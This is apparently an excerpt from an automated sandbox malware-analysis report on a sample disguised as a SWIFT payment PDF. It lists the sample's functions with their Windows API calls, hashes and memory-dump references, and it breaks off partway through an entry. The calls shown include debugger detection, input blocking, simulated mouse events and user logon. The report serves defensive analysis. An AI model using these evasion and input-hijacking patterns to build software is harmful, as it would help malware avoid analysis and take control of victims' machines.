                                                                                                                              • API String ID: 15083398-0
                                                                                                                              • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                              • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                                                                              • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                              • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @oH$\$^$h
                                                                                                                              • API String ID: 0-3701065813
                                                                                                                              • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                              • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                                                                              • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                              • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                                                                              APIs
                                                                                                                              • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                                                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: mouse_event
                                                                                                                              • String ID: DOWN
                                                                                                                              • API String ID: 2434400541-711622031
                                                                                                                              • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                              • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                                                                              • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                              • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                                              • GetTimeZoneInformation.KERNEL32(00496E80,00000000,00000000,00000000,00000000,00000000,0048D360,0000002C,0041EA73,0048D380,00000008,004156E4,?,?,?), ref: 0041E48D
                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00496E84,?,?,0000003F,00000000,?), ref: 0041E50B
                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00496ED8,000000FF,?,0000003F,00000000,?), ref: 0041E53F
                                                                                                                                • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                                                                                                                • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiWide$CriticalEnterErrorFreeHeapInformationLastSectionTimeZone
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1184061189-0
                                                                                                                              • Opcode ID: 06bac6a452c31c1cadde7db59fb0f05edc8b02e6f9b57d0d22076e8f651fa20f
                                                                                                                              • Instruction ID: 6e93d5efaa4a90a82b68055889133adc72b509ee617d9465a01728c8ae8b60d1
                                                                                                                              • Opcode Fuzzy Hash: 06bac6a452c31c1cadde7db59fb0f05edc8b02e6f9b57d0d22076e8f651fa20f
                                                                                                                              • Instruction Fuzzy Hash: D391C3B5900255AFDB109FA6E8819DEBBB5BF19354B54003FE940A7251D7389D82CB2C
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3541575487-0
                                                                                                                              • Opcode ID: eae3f5a3b7237ff41c3bf9ab8d31e2e7de6a625c8a14a51f6d4c2f6ae7e73f22
                                                                                                                              • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                                                              • Opcode Fuzzy Hash: eae3f5a3b7237ff41c3bf9ab8d31e2e7de6a625c8a14a51f6d4c2f6ae7e73f22
                                                                                                                              • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                                                              APIs
                                                                                                                              • IsDebuggerPresent.KERNEL32(?,00000001,00000000), ref: 00417E94
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00000001,00000000), ref: 00417E9E
                                                                                                                              • UnhandledExceptionFilter.KERNEL32(00401884,?,00000001,00000000), ref: 00417EAB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3906539128-0
                                                                                                                              • Opcode ID: 42f93e18c6965526c6f2e22395c6ba628ee7d052eafe2f53a52ba4c41b503b79
                                                                                                                              • Instruction ID: 31b9ab21867ad1b842961dd6fee13a806953e064714b7494ebc73d94b307db22
                                                                                                                              • Opcode Fuzzy Hash: 42f93e18c6965526c6f2e22395c6ba628ee7d052eafe2f53a52ba4c41b503b79
                                                                                                                              • Instruction Fuzzy Hash: 0931E6B49013189BCB25DF25E9887DDB7B8BF08314F2045EEE41DA6291D7785B858F48
                                                                                                                              APIs
                                                                                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                                                              • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                                                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 901099227-0
                                                                                                                              • Opcode ID: 61fb9ab2a3299f8cead921e80471455f6f6b20a2502781ff411aee126c92a39c
                                                                                                                              • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                                                              • Opcode Fuzzy Hash: 61fb9ab2a3299f8cead921e80471455f6f6b20a2502781ff411aee126c92a39c
                                                                                                                              • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: U$\
                                                                                                                              • API String ID: 0-100911408
                                                                                                                              • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                                              • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                                                                              • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                                              • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                                                                              APIs
                                                                                                                              • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Proc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2346855178-0
                                                                                                                              • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                                              • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                                                                              • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                                              • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              • Opcode ID: ffc2c54a803d8e62ee64ba702a71a0c2ad33d9a94fd471698b382dbafb19470f
                                                                                                                              • Instruction ID: 1b4906d9f21e259b66daec5d2a4723cdb99d299d7388338d70b106eeb17f64f0
                                                                                                                              • Opcode Fuzzy Hash: ffc2c54a803d8e62ee64ba702a71a0c2ad33d9a94fd471698b382dbafb19470f
                                                                                                                              • Instruction Fuzzy Hash: 3812C672E106298BDF04CF68E8402EDB7F2FBDC324F65866AD822B7291C7746945CB54
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              • Opcode ID: 35f29efe896d92e278ea5730d8026191a9a27f48d539ee70e39862e3a79d8b72
                                                                                                                              • Instruction ID: 0afce909dabaa5e95ec5d1ea5a481b42890bf02549eecc74570a87147bc0db1b
                                                                                                                              • Opcode Fuzzy Hash: 35f29efe896d92e278ea5730d8026191a9a27f48d539ee70e39862e3a79d8b72
                                                                                                                              • Instruction Fuzzy Hash: BE12C772E005298BDF04CF68E8406FDB7B2FB9C324F65866AD922B76A0C3756905CB54
                                                                                                                              APIs
                                                                                                                              • RaiseException.KERNEL32(?,00000000,00000001,?,00000000,0000FFFF,?,?,0041D021,?,?,?,?,?,?,00000000), ref: 0041CBD2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionRaise
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3997070919-0
                                                                                                                              • Opcode ID: be9b892149dac616f6f2b4bb9e12525933cb1ef408c0ce5f8a17f829d6645e12
                                                                                                                              • Instruction ID: 35e32dd4fa6ffe26e0583047641d8dd1063716a1bc02121514e6ae778c8d8cb2
                                                                                                                              • Opcode Fuzzy Hash: be9b892149dac616f6f2b4bb9e12525933cb1ef408c0ce5f8a17f829d6645e12
                                                                                                                              • Instruction Fuzzy Hash: C5B17B31510609CFD718CF18C8D6AA67BE0FF45354F19865EE99ACF2A1C738E991CB88
                                                                                                                              APIs
                                                                                                                              • BlockInput.USER32(00000001), ref: 0045A38B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BlockInput
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3456056419-0
                                                                                                                              • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                              • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                                                                              • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                              • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                                                              APIs
                                                                                                                              • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LogonUser
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1244722697-0
                                                                                                                              • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                              • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                                                              • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                              • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                                                              APIs
                                                                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: NameUser
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2645101109-0
                                                                                                                              • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                                              • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                                                                              • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                                              • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                                                                              APIs
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
